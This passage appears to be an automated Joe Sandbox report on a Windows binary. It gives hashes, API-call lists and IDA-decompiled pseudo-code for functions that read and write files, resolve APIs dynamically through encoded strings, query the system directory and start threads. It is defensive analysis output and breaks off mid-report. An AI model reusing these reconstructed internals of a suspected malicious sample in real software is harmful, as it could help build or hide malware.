                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: File$HeapPointer$AllocateCloseCreateHandleProcessRead
                          • String ID:
                          • API String ID: 2919383809-0
                          • Opcode ID: f69ccd87e4880429cb6067376177a3d9cf22d8259ac850b08455f645c7d5a0f5
                          • Instruction ID: 1f43e7d2689ff1f78022d1c0c4f177b567fa58fdd9c39e128e842f7f5ae786c5
                          • Opcode Fuzzy Hash: f69ccd87e4880429cb6067376177a3d9cf22d8259ac850b08455f645c7d5a0f5
                          • Instruction Fuzzy Hash: 7C11E2B12006097FE2312A696C89F3B3E9CEF85398F45042BF944D6351EA61DD05D6B2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WSAStartup.WS2_32(00000202,?), ref: 005C538D
                          • gethostname.WS2_32(?,000000FF), ref: 005C53AA
                          • getaddrinfo.WS2_32(?,00000000,00000000), ref: 005C53C0
                          • FreeAddrInfoW.WS2_32(00000000), ref: 005C5444
                          • WSACleanup.WS2_32 ref: 005C544F
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: AddrCleanupFreeInfoStartupgetaddrinfogethostname
                          • String ID:
                          • API String ID: 2736887295-0
                          • Opcode ID: 70dff35793b30c02feb75cc4b788c959ed5d9ce2cb87c1481e5451f26b484a07
                          • Instruction ID: 481576b75ff604f1b391310f333df22ba226a3621a78f4ba213ca2f37ccdd094
                          • Opcode Fuzzy Hash: 70dff35793b30c02feb75cc4b788c959ed5d9ce2cb87c1481e5451f26b484a07
                          • Instruction Fuzzy Hash: 77213A31A41A115FFF3886E48CC8F726B99FB50322F48013EDE11862A1F734ACC29652
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005D7BE0(void* __eax, WCHAR* _a4, void** _a8, long* _a12) {
                          				void* _t7;
                          				long _t8;
                          				long _t10;
                          				void* _t13;
                          				void* _t17;
                          				void* _t21;
                          				void* _t22;
                          				long* _t23;
                          				long _t24;
                          				DWORD* _t25;
                          
                          				_t23 = _a12;
                          				_t22 = 0;
                          				 *_t25 = 0;
                          				_t7 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                          				if(_t7 == 0xffffffff) {
                          					_t8 = 0;
                          					_t17 = 0;
                          				} else {
                          					_t21 = _t7;
                          					_t22 = 0;
                          					_t10 = SetFilePointer(_t7, 0, 0, 2);
                          					_t24 = _t10;
                          					 *_t25 = _t10;
                          					SetFilePointer(_t21, 0, 0, 0);
                          					_t17 = 1;
                          					if(_t24 != 0) {
                          						_t13 = E005C3180(_t24, 0);
                          						_t25 =  &(_t25[2]);
                          						if(_t13 == 0) {
                          							L5:
                          							_t22 = 0;
                          							_t17 = 0;
                          						} else {
                          							_t22 = _t13;
                          							if(ReadFile(_t21, _t22, _t24, _t25, 0) == 0) {
                          								E005C91E0(_t22);
                          								_t25 =  &(_t25[1]);
                          								 *_t25 = 0;
                          								goto L5;
                          							}
                          						}
                          					}
                          					_t23 = _a12;
                          					CloseHandle(_t21);
                          					_t8 =  *_t25;
                          				}
                          				 *_a8 = _t22;
                          				 *_t23 = _t8;
                          				return _t17;
                          			}

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 005D7C03
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?), ref: 005D7C1D
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 005D7C28
                          • CloseHandle.KERNEL32(00000000), ref: 005D7C6D
                            • Part of subcall function 005C3180: GetProcessHeap.KERNEL32(00000000,00000000,005D2549,?,00000000,00000001,00000000), ref: 005C3193
                            • Part of subcall function 005C3180: RtlReAllocateHeap.NTDLL(00230000,00000008,?,?), ref: 005C31B0
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 005D7C4A
                            • Part of subcall function 005C91E0: RtlFreeHeap.NTDLL(00000008,?,005C9F64), ref: 005C91F1
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: File$Heap$Pointer$AllocateCloseCreateFreeHandleProcessRead
                          • String ID:
                          • API String ID: 1200625078-0
                          • Opcode ID: a11eefc251ba2620f30fa555079560848f2a8e517e36f9c0275a82c467dfa1a3
                          • Instruction ID: 8adb75b5d4bfec79d8fc4c884f46f2fecbfd1b3550db6bc8f7734c00c153d402
                          • Opcode Fuzzy Hash: a11eefc251ba2620f30fa555079560848f2a8e517e36f9c0275a82c467dfa1a3
                          • Instruction Fuzzy Hash: 57118171215324BFD3309E699C89F6B7EDCFF4A7A4F01052EF948D6290E6609D04C6A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005D18C0(signed int __ecx, void* __eflags) {
                          				char _v524;
                          				struct HINSTANCE__* _t7;
                          				signed int _t8;
                          				signed int _t20;
                          				CHAR* _t22;
                          				WCHAR* _t23;
                          				struct HINSTANCE__* _t24;
                          				void* _t25;
                          				CHAR* _t26;
                          
                          				_t20 = __ecx;
                          				_t23 =  &_v524;
                          				E005D4520(_t23, 0x41);
                          				_t26 = _t25 + 8;
                          				_t7 = LoadLibraryW(_t23);
                          				_t24 = _t7;
                          				if(_t7 == 0) {
                          					_t8 =  *0x5d9c00; // 0x0
                          				} else {
                          					_t22 = _t26;
                          					E005D7160(_t22, 0x42);
                          					 *0x5d9c4c = GetProcAddress(_t24, _t22);
                          					E005D7160(_t22, 0x43);
                          					 *0x5d9be8 = GetProcAddress(_t24, _t22);
                          					E005D7160(_t22, 0x44);
                          					 *0x5d9b80 = GetProcAddress(_t24, _t22);
                          					E005D7160(_t22, 0x45);
                          					_t8 = GetProcAddress(_t24, _t22);
                          					 *0x5d9c00 = _t8;
                          				}
                          				return (_t8 & 0xffffff00 | _t8 != 0x00000000) & (_t20 & 0xffffff00 | _t24 != 0x00000000) & 0x000000ff;
                          			}

                          APIs
                          • LoadLibraryW.KERNEL32(?), ref: 005D18DC
                          • GetProcAddress.KERNEL32(00000000), ref: 005D18FD
                          • GetProcAddress.KERNEL32(00000000), ref: 005D1911
                          • GetProcAddress.KERNEL32(00000000), ref: 005D1925
                          • GetProcAddress.KERNEL32(00000000), ref: 005D1939
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID:
                          • API String ID: 2238633743-0
                          • Opcode ID: 6413e6ccf9b8f8a5d0d7d4503fe57bc93f12c6fb8176bd425470806df1a9e0a7
                          • Instruction ID: 1a5c704c06b7cd0747ea4e811dc04f0cfce77ecbe4f10ea14cf5f130ad9767c9
                          • Opcode Fuzzy Hash: 6413e6ccf9b8f8a5d0d7d4503fe57bc93f12c6fb8176bd425470806df1a9e0a7
                          • Instruction Fuzzy Hash: 0E01B9B190251577D2326725BC86EAF3BACBFE7701F440017FA0896351FB284A49D6BE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 95%
                          			E005CF5A0(short* __ecx, void* __eflags) {
                          				void* _t73;
                          				intOrPtr _t74;
                          				signed int _t77;
                          				signed int _t82;
                          				intOrPtr _t84;
                          				intOrPtr _t86;
                          				short* _t88;
                          				signed int _t89;
                          				intOrPtr _t92;
                          				intOrPtr* _t94;
                          				void* _t95;
                          				signed int _t96;
                          				intOrPtr _t104;
                          				void* _t105;
                          				short* _t106;
                          				intOrPtr _t108;
                          				void* _t109;
                          				signed int _t110;
                          				signed int _t111;
                          				signed int _t114;
                          				signed int _t115;
                          				signed int _t116;
                          				signed int _t117;
                          				short* _t118;
                          				WCHAR* _t119;
                          				signed int _t123;
                          				void* _t124;
                          				void* _t125;
                          				void* _t126;
                          				void* _t127;
                          				void* _t129;
                          				void* _t136;
                          				intOrPtr _t139;
                          
                          				_t129 = __eflags;
                          				_t118 = __ecx;
                          				E005D6610(_t125, 0, 0x864);
                          				_t126 = _t125 + 0xc;
                          				_t94 = _t126 + 0x54;
                          				_t73 = E005CFA90(_t118, _t129, 0, _t94, 0, 0, 1);
                          				_t74 =  *_t94;
                          				if(_t73 == 0 || _t74 == 0) {
                          					L31:
                          					if(_t74 != 0) {
                          						E005C91E0(_t74);
                          						_t126 = _t126 + 4;
                          					}
                          					return  *((intOrPtr*)(_t126 + 0x60));
                          				} else {
                          					_t119 = _t126 + 0x64;
                          					_t77 = GetSystemDirectoryW(_t119, 0x200);
                          					 *(_t119 - 8) = _t77;
                          					 *((intOrPtr*)(_t126 + 0x64 + _t77 * 2)) = 0x5c;
                          					E005D4520(_t126 + 0x66 +  *(_t119 - 8) * 2, 0x5c);
                          					_t127 = _t126 + 8;
                          					_t82 = E005D4520(_t127 + 0x464, 0x79);
                          					_t126 = _t127 + 8;
                          					 *(_t119 - 8) = _t82;
                          					if(0x400 - _t82 <= 0) {
                          						_t108 = 0x80070057;
                          						if(__eflags != 0) {
                          							 *((short*)(_t126 + 0x464 + _t82 * 2)) = 0;
                          						}
                          						goto L11;
                          					} else {
                          						_t104 =  *((intOrPtr*)(_t126 + 0x54));
                          						_t95 = _t126 + 0x462 + _t82 * 2;
                          						_t123 = 0;
                          						_t109 = _t95;
                          						while(1) {
                          							_t114 =  *(_t104 + _t123 * 2) & 0x0000ffff;
                          							if(_t114 == 0) {
                          								break;
                          							}
                          							 *(_t95 + 2 + _t123 * 2) = _t114;
                          							_t109 = _t109 + 2;
                          							_t23 = _t123 + 1; // 0x1
                          							_t117 = _t23;
                          							if(_t82 + _t123 == 0x3ff) {
                          								L7:
                          								_t25 = _t82 + _t117 != 0x400;
                          								 *((short*)(_t109 + (0 | _t25) * 2)) = 0;
                          								_t108 = 0x8007007a;
                          								if(_t25 == 0) {
                          									L11:
                          									 *((intOrPtr*)(_t126 + 0x58)) = _t108;
                          									L30:
                          									_t74 =  *((intOrPtr*)(_t126 + 0x54));
                          									goto L31;
                          								}
                          								L13:
                          								_t124 = _t126 + 0x64;
                          								_t139 =  *0x5d9ae8; // 0x0
                          								 *((intOrPtr*)(_t126 + 0x58)) = 0;
                          								if(_t139 == 0) {
                          									L27:
                          									if( *((intOrPtr*)(_t126 + 0x60)) != 0) {
                          										L29:
                          										_t84 =  *0x5d9b0c; // 0x26f2b8
                          										 *((intOrPtr*)(_t84 + 8)) = 1;
                          										goto L30;
                          									}
                          									_t86 = E005D6E60(0, _t124, _t126 + 0x464);
                          									_t126 = _t126 + 0xc;
                          									 *((intOrPtr*)(_t126 + 0x60)) = _t86;
                          									if(_t86 == 0) {
                          										goto L30;
                          									}
                          									goto L29;
                          								}
                          								E005C91E0(_t104);
                          								_t88 = E005C3180(0x800, 0);
                          								_t126 = _t126 + 0xc;
                          								_t105 = 0xfffff800;
                          								 *((intOrPtr*)(_t126 + 0x54)) = _t88;
                          								while(1) {
                          									_t110 =  *(_t126 + _t105 + 0x864) & 0x0000ffff;
                          									if(_t110 == 0) {
                          										break;
                          									}
                          									 *(_t88 + _t105 + 0x800) = _t110;
                          									_t105 = _t105 + 2;
                          									if(_t105 != 0) {
                          										continue;
                          									}
                          									 *((short*)(_t88 + _t105 + 0x7fe)) = 0;
                          									 *((intOrPtr*)(_t126 + 0x58)) = 0x8007007a;
                          									goto L27;
                          								}
                          								 *(_t88 + _t105 + 0x800) = 0;
                          								_t111 = 0x400;
                          								_t106 = _t88;
                          								 *((intOrPtr*)(_t126 + 0x58)) = 0;
                          								while(1) {
                          									__eflags =  *_t106;
                          									if( *_t106 == 0) {
                          										break;
                          									}
                          									_t106 = _t106 + 2;
                          									_t111 = _t111 - 1;
                          									__eflags = _t111;
                          									if(_t111 != 0) {
                          										continue;
                          									}
                          									_t92 = 0x80070057;
                          									L26:
                          									 *((intOrPtr*)(_t126 + 0x58)) = _t92;
                          									goto L27;
                          								}
                          								_t115 = 0;
                          								__eflags = 0;
                          								while(1) {
                          									_t96 = _t115;
                          									_t116 =  *(_t126 + 0x464 + _t115 * 2) & 0x0000ffff;
                          									__eflags = _t116;
                          									if(_t116 == 0) {
                          										break;
                          									}
                          									 *(_t106 + _t96 * 2) = _t116;
                          									_t53 = _t96 + 1; // 0x1
                          									_t115 = _t53;
                          									__eflags = _t111 - _t115;
                          									if(_t111 != _t115) {
                          										continue;
                          									}
                          									_t92 = 0x8007007a;
                          									 *(_t106 + _t96 * 2) = 0;
                          									goto L26;
                          								}
                          								 *(_t106 + _t96 * 2) = 0;
                          								 *((intOrPtr*)(_t126 + 0x58)) = 0;
                          								_push(0);
                          								_push(0);
                          								_push(0x420);
                          								_push(_t88);
                          								_push(_t126 + 0x48);
                          								_t89 = E005C5470(_t126 + 0x44);
                          								_t126 = _t126 + 0x18;
                          								__eflags = _t89;
                          								if(_t89 != 0) {
                          									CloseHandle( *(_t126 + 0x44));
                          									CloseHandle( *(_t126 + 0x48));
                          									 *((intOrPtr*)(_t126 + 0x60)) = 1;
                          								}
                          								goto L27;
                          							}
                          							_t136 = _t123 - 0x7ffffffd;
                          							_t123 = _t117;
                          							if(_t136 != 0) {
                          								continue;
                          							}
                          							goto L7;
                          						}
                          						 *(_t95 + 2 + _t123 * 2) = 0;
                          						goto L13;
                          					}
                          				}
                          			}

                          APIs
                          • GetSystemDirectoryW.KERNEL32(?,00000200), ref: 005CF5EC
                          • CloseHandle.KERNEL32(?), ref: 005CF7E1
                          • CloseHandle.KERNEL32(?), ref: 005CF7E7
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CloseHandle$DirectorySystem
                          • String ID: z
                          • API String ID: 1693769833-1657960367
                          • Opcode ID: cd93b84d0c1072f9be1d6ddc8c4292f9c5d21c7f3999de1d6b6ec79d344b1e91
                          • Instruction ID: 4607d989b8331acd5a24606e44e17aba59ac92b8faeaca2d7003a925940eb94a
                          • Opcode Fuzzy Hash: cd93b84d0c1072f9be1d6ddc8c4292f9c5d21c7f3999de1d6b6ec79d344b1e91
                          • Instruction Fuzzy Hash: 1751D0B0A043019FDB209FA4D949F6BBBE6FFC0704F14843EE5448B2A1E77A9945C796
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E005D5C10(void* __ecx, void* __eflags) {
                          				void* _t18;
                          				void* _t20;
                          				void* _t21;
                          				int _t24;
                          				void* _t32;
                          
                          				_t32 = __ecx;
                          				if(E005C1F50(_t18, __ecx) != 0) {
                          					E005CDCC0(__ecx,  *((intOrPtr*)(__ecx + 0x44)));
                          				}
                          				_t20 =  *(_t32 + 0x70);
                          				if(_t20 != 0) {
                          					CloseHandle(_t20);
                          					 *(_t32 + 0x70) = 0;
                          				}
                          				_t21 =  *(_t32 + 0x74);
                          				if(_t21 != 0) {
                          					CloseHandle(_t21);
                          					 *(_t32 + 0x74) = 0;
                          				}
                          				 *((intOrPtr*)(_t32 + 0x80)) = 0;
                          				 *((intOrPtr*)(_t32 + 0x44)) = 0;
                          				 *((intOrPtr*)(_t32 + 0x94)) = 0;
                          				 *((intOrPtr*)(_t32 + 0x98)) = 0;
                          				 *((intOrPtr*)(_t32 + 0x7c)) = 0;
                          				 *((intOrPtr*)(_t32 + 0x78)) = 0;
                          				CloseHandle( *(_t32 + 0x88));
                          				 *(_t32 + 0x88) = 0;
                          				CloseHandle( *(_t32 + 0x8c));
                          				 *(_t32 + 0x8c) = 0;
                          				_t24 = CloseHandle( *(_t32 + 0x90));
                          				 *(_t32 + 0x90) = 0;
                          				return _t24;
                          			}

                          APIs
                            • Part of subcall function 005C1F50: GetExitCodeThread.KERNEL32(?,?,?,?,005C391B), ref: 005C1F6A
                          • CloseHandle.KERNEL32(?), ref: 005D5C30
                          • CloseHandle.KERNEL32(?), ref: 005D5C45
                          • CloseHandle.KERNEL32(?), ref: 005D5C7B
                          • CloseHandle.KERNEL32(?), ref: 005D5C89
                          • CloseHandle.KERNEL32(?), ref: 005D5C97
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: CloseHandle$CodeExitThread
                          • String ID:
                          • API String ID: 1430014291-0
                          • Opcode ID: 6d7d6480530fcbf972ed5ac5844bf8a09251e7bbd4e86cac2279bd0b12497784
                          • Instruction ID: 327ee4fbd544c285fa50dd402b7ac5b5718d4daac4b52d246c07d20fd4642e7d
                          • Opcode Fuzzy Hash: 6d7d6480530fcbf972ed5ac5844bf8a09251e7bbd4e86cac2279bd0b12497784
                          • Instruction Fuzzy Hash: 960140B0611B009BD7319F7AD948B47FFE9BF94741F40881FA6AAC2671DB71A8049B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E005C7C50() {
                          				long _t42;
                          				void* _t44;
                          				long _t45;
                          				long _t47;
                          				signed int _t49;
                          				long _t51;
                          				long _t54;
                          				intOrPtr _t55;
                          				signed int _t62;
                          				WCHAR* _t63;
                          				signed int _t64;
                          				signed int _t65;
                          				long _t69;
                          				void* _t70;
                          				long _t71;
                          				struct _SECURITY_ATTRIBUTES* _t75;
                          				long _t80;
                          				signed int _t83;
                          				signed int _t86;
                          				signed int _t87;
                          				WCHAR* _t89;
                          				void* _t90;
                          				signed int _t91;
                          				signed int _t92;
                          				long _t93;
                          				signed int _t100;
                          				struct _SECURITY_ATTRIBUTES* _t102;
                          				void* _t104;
                          				WCHAR* _t107;
                          				void* _t108;
                          				DWORD* _t109;
                          				long* _t112;
                          
                          				_t42 =  *0x5d9b9c; // 0x0
                          				_t102 = 0;
                          				 *(_t108 + 4) = 0;
                          				 *((intOrPtr*)(_t108 + 8)) = 0;
                          				if( *_t42 == 1) {
                          					L44:
                          					return _t102;
                          				}
                          				_t44 = E005CB7A0( *0x5d9c40);
                          				_t109 = _t108 + 4;
                          				_t104 = _t44;
                          				_t45 =  *0x5d9b9c; // 0x0
                          				_t102 = 0;
                          				_t90 =  *_t45;
                          				if(_t90 == 0) {
                          					__eflags =  *(_t45 + 0x10);
                          					if(__eflags != 0) {
                          						L13:
                          						E005C9DB0(__eflags);
                          						_t47 =  *0x5d9b9c; // 0x0
                          						_t49 = E005D4610(_t109[0x3c], 0x19, _t47 + 4);
                          						_t109 =  &(_t109[3]);
                          						__eflags = _t49;
                          						if(_t49 == 0) {
                          							L42:
                          							if(_t104 != 0) {
                          								E005C91E0(_t104);
                          							}
                          							goto L44;
                          						}
                          						_t51 =  *0x5d9b9c; // 0x0
                          						_t91 =  *(_t51 + 4);
                          						__eflags = _t91;
                          						if(_t91 == 0) {
                          							goto L42;
                          						}
                          						__eflags =  *_t91;
                          						_t109[3] = _t51;
                          						if( *_t91 == 0) {
                          							_t100 = _t91;
                          							_t83 = _t91;
                          							L26:
                          							__eflags = _t100 - _t91;
                          							if(_t100 <= _t91) {
                          								L41:
                          								_t102 = 0;
                          								__eflags = 0;
                          								CreateThread(0, 0, E005D6DB0, 0, 0, _t109);
                          								Sleep(0x1f4);
                          								goto L42;
                          							}
                          							__eflags = _t83 - _t91 - 0x3ff;
                          							if(_t83 - _t91 > 0x3ff) {
                          								goto L41;
                          							}
                          							_t107 = _t100 - 2;
                          							while(1) {
                          								__eflags = _t107 - _t91;
                          								if(_t107 <= _t91) {
                          									break;
                          								}
                          								_t65 =  *_t107 & 0x0000ffff;
                          								_t107 =  &(_t107[0xffffffffffffffff]);
                          								__eflags = _t65 - 0x2f;
                          								if(_t65 != 0x2f) {
                          									continue;
                          								}
                          								_t107 =  &(_t107[2]);
                          								__eflags = _t107;
                          								break;
                          							}
                          							_t54 = _t109[3];
                          							__eflags = _t107 - _t100;
                          							if(_t107 >= _t100) {
                          								L38:
                          								_t92 =  *(_t54 + 0x14);
                          								__eflags = _t92;
                          								if(_t92 != 0) {
                          									E005C91E0(_t92);
                          									_t109 =  &(_t109[1]);
                          									_t54 =  *0x5d9b9c; // 0x0
                          								}
                          								_t86 = _t83 + 0x00000002 - _t107 & 0xfffffffe;
                          								__eflags = _t86;
                          								 *(_t54 + 0x18) = _t86;
                          								_t55 = E005C3180(_t86, 0);
                          								_t93 =  *0x5d9b9c; // 0x0
                          								 *((intOrPtr*)(_t93 + 0x14)) = _t55;
                          								E005CC400(_t55, _t107,  *((intOrPtr*)(_t93 + 0x18)));
                          								_t109 =  &(_t109[5]);
                          								goto L41;
                          							}
                          							E005D4520( &(_t109[5]), 0x9e);
                          							_t112 =  &(_t109[2]);
                          							_t62 = E005D7BE0( &(_t112[7]),  &(_t112[7]), _t112,  &(_t112[4]));
                          							_t109 =  &(_t112[3]);
                          							__eflags = _t62;
                          							if(_t62 == 0) {
                          								L37:
                          								_t54 =  *0x5d9b9c; // 0x0
                          								goto L38;
                          							}
                          							_t63 =  *_t109;
                          							__eflags = _t63;
                          							if(_t63 == 0) {
                          								goto L37;
                          							}
                          							__eflags = _t109[4];
                          							if(_t109[4] == 0) {
                          								goto L37;
                          							}
                          							_t64 = lstrcmpiW(_t107, _t63);
                          							__eflags = _t64;
                          							if(_t64 == 0) {
                          								goto L42;
                          							}
                          							goto L37;
                          						}
                          						_t87 = _t91 + 2;
                          						while(1) {
                          							_t100 = _t87;
                          							__eflags = _t87 - _t91 - 0x400;
                          							if(_t87 - _t91 >= 0x400) {
                          								break;
                          							}
                          							__eflags =  *_t100;
                          							_t87 = _t100 + 2;
                          							if( *_t100 != 0) {
                          								continue;
                          							}
                          							_t83 = _t87 + 0xfffffffe;
                          							goto L26;
                          						}
                          						_t83 = _t100;
                          						goto L26;
                          					}
                          					_t89 =  &(_t109[5]);
                          					E005D4520(_t89, 0x9e);
                          					_t109 =  &(_t109[2]);
                          					__eflags = GetFileAttributesW(_t89) & 0x00000010;
                          					if(__eflags != 0) {
                          						goto L42;
                          					}
                          					goto L13;
                          				}
                          				if(_t90 != 2) {
                          					goto L42;
                          				}
                          				_t102 = 0;
                          				 *_t45 = 0;
                          				if( *((intOrPtr*)(_t45 + 8)) != 0 &&  *((intOrPtr*)(_t45 + 0xc)) != 0) {
                          					if( *((intOrPtr*)(_t45 + 0x14)) != 0 &&  *((intOrPtr*)(_t45 + 0x18)) != 0) {
                          						E005D4520( &(_t109[5]), 0x9e);
                          						_t80 =  *0x5d9b9c; // 0x0
                          						E005C6270(_t80,  &(_t109[5]),  *((intOrPtr*)(_t80 + 0x14)),  *((intOrPtr*)(_t80 + 0x18)));
                          						_t109 =  &(_t109[5]);
                          					}
                          					E005D30C0(_t109);
                          					_t69 =  *0x5d9b9c; // 0x0
                          					_t70 = E005D6F80( *((intOrPtr*)(_t69 + 8)),  *((intOrPtr*)(_t69 + 0xc)),  &(_t109[1]),  &(_t109[2]));
                          					_t109 =  &(_t109[4]);
                          					_t121 = _t70;
                          					if(_t70 == 0) {
                          						_t102 = 0;
                          						__eflags = 0;
                          					} else {
                          						_push(_t109[0x3d]);
                          						_push(_t109[3]);
                          						_push(_t109[3]);
                          						_t75 = E005D05C0(_t121);
                          						_t109 =  &(_t109[3]);
                          						_t102 = _t75;
                          						_t76 = _t109[1];
                          						if(_t109[1] != 0) {
                          							E005C91E0(_t76);
                          							_t109 =  &(_t109[1]);
                          							_t109[1] = 0;
                          							_t109[2] = 0;
                          						}
                          					}
                          					_t71 =  *0x5d9b9c; // 0x0
                          					_t72 =  *(_t71 + 8);
                          					if( *(_t71 + 8) != 0) {
                          						E005C91E0(_t72);
                          						_t109 =  &(_t109[1]);
                          						_t72 =  *0x5d9b9c; // 0x0
                          						 *((intOrPtr*)(_t72 + 8)) = 0;
                          						 *((intOrPtr*)(_t72 + 0xc)) = 0;
                          					}
                          					E005D03D0(_t72);
                          				}
                          			}

                          APIs
                          • GetFileAttributesW.KERNEL32(?), ref: 005C7D67
                          • lstrcmpiW.KERNEL32(?,00000000), ref: 005C7E7E
                          • CreateThread.KERNEL32(00000000,00000000,005D6DB0,00000000,00000000), ref: 005C7EDC
                          • Sleep.KERNEL32(000001F4), ref: 005C7EE7
                            • Part of subcall function 005C6270: CreateFileW.KERNEL32(005D077D,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 005C628D
                            • Part of subcall function 005C6270: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005C62A8
                            • Part of subcall function 005C6270: CloseHandle.KERNEL32(00000000), ref: 005C62B6
                          Memory Dump Source
                          • Source File: 00000002.00000002.267364030.005C1000.00000020.00000001.sdmp, Offset: 005C0000, based on PE: true
• Associated: 00000002.00000002.267358206.005C0000.00000002.00000001.sdmp
• Associated: 00000002.00000002.267382270.005D8000.00000004.00000001.sdmp
• Associated: 00000002.00000002.267389405.005DA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_5c0000_______.jbxd
                          Similarity
                          • API ID: File$Create$AttributesCloseHandleSleepThreadWritelstrcmpi
                          • String ID:
                          • API String ID: 357108698-0
                          • Opcode ID: 68ecbbdb4bb818ddffea97aede051dced066ef77d63f59a2ada338887f7032dd
                          • Instruction ID: 75c600ee3f2ef33f6bd192f72880da98091a9fc065560692f04d6783c7da8178
                          • Opcode Fuzzy Hash: 68ecbbdb4bb818ddffea97aede051dced066ef77d63f59a2ada338887f7032dd
                          • Instruction Fuzzy Hash: 5B71A672618206AFDB24EF64EC49F2A7BA8BF94304F05446FF40987661E731DD04DB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 57%
                          			E005D0300(intOrPtr* __ecx, void* __edx) {
                          				void* _t14;
                          				void* _t28;
                          				signed int _t30;
                          				void* _t33;
                          				signed int _t34;
                          				void* _t35;
                          				intOrPtr* _t37;
                          				signed int _t38;
                          				intOrPtr* _t39;
                          				void* _t40;
                          				signed int* _t41;
                          
                          				_t33 = __edx;
                          				_t34 = 0;
                          				_t37 = __ecx;
                          				 *_t39 = 0;
                          				 *0x5d9d54(0x5d9bbc);
                          				_t43 =  *__ecx;
                          				if( *__ecx != 0) {
                          					while(E005D5020( *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)) + _t34 * 4)), _t43, 0) != 0) {
                          						_t34 = _t34 + 1;
                          						if(_t34 <  *_t37) {
                          							continue;
                          						}
                          						goto L3;
                          					}
                          					 *0x5d9d9c(0x5d9bbc);
                          					__eflags = 0;
                          					return 0;
                          				}
                          				L3:
                          				 *0x5d9d9c(0x5d9bbc);
                          				_t35 = _t39 + 4;
                          				E005D4520(_t35, 0x24);
                          				_t40 = _t39 + 8;
                          				_push(_t40);
                          				_push(_t35);
                          				_t14 = E005CD4B0();
                          				_t41 = _t40 + 8;
                          				_t28 = _t14;
                          				if(_t28 != 0) {
                          					_t30 =  *_t41;
                          					if(_t30 <= 0) {
                          						while(1) {
                          							L9:
                          							_t17 = _t30 - 1;
                          							 *_t41 = _t30 - 1;
                          							if(_t30 == 0) {
                          								break;
                          							}
                          							E005C91E0( *((intOrPtr*)(_t28 + _t17 * 4)));
                          							_t41 =  &(_t41[1]);
                          							_t30 =  *_t41;
                          						}
                          						E005C91E0(_t28);
                          						return 1;
                          					}
                          					_t38 = 0;
                          					do {
                          						E005C6570(_t37, _t33, 0, PathFindFileNameW( *(_t28 + _t38 * 4)));
                          						_t30 =  *_t41;
                          						_t38 = _t38 + 1;
                          					} while (_t38 < _t30);
                          					goto L9;
                          				}
                          				return 1;
                          			}

                          APIs
                          • RtlEnterCriticalSection.NTDLL(005D9BBC), ref: 005D0316
                          • RtlLeaveCriticalSection.NTDLL(005D9BBC), ref: 005D033F
                          • PathFindFileNameW.SHLWAPI(00000000), ref: 005D037B
